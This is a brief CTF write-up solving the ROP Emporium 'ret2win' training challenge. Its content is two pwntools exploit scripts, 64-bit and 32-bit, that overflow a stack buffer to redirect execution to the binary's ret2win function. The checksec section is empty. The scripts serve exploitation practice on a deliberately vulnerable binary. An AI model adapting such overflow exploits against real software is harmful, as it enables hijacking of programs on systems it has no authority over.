[ROP Emporium] ret2win (32bit, 64bit)

SYSTEM HACKING/CTF, etc

by koharin 2020. 3. 25. 19:42

# checksec

 


# exploit code & exploit

 

1. 64bit

 

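#!/usr/bin/python
from pwn import *

p = process("./ret2win")
elf = ELF("./ret2win")
# Address of ret2win(), read from the binary's symbol table
ret2win = elf.symbols['ret2win']

# 0x28 bytes of padding up to the saved return address, then ret2win()
pay = b'A'*0x28 + p64(ret2win)

p.sendlineafter(b"> ", pay)

p.interactive()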

 

2. 32bit

 

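#!/usr/bin/python
from pwn import *

p = process("./ret2win32")
elf = ELF("./ret2win32")
# Address of ret2win(), read from the binary's symbol table
ret2win = elf.symbols['ret2win']

# 0x28+0x4 bytes of padding up to the saved return address, then ret2win()
p.sendlineafter(b"> ", b'A'*(0x28+0x4) + p32(ret2win))

p.interactive()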


 
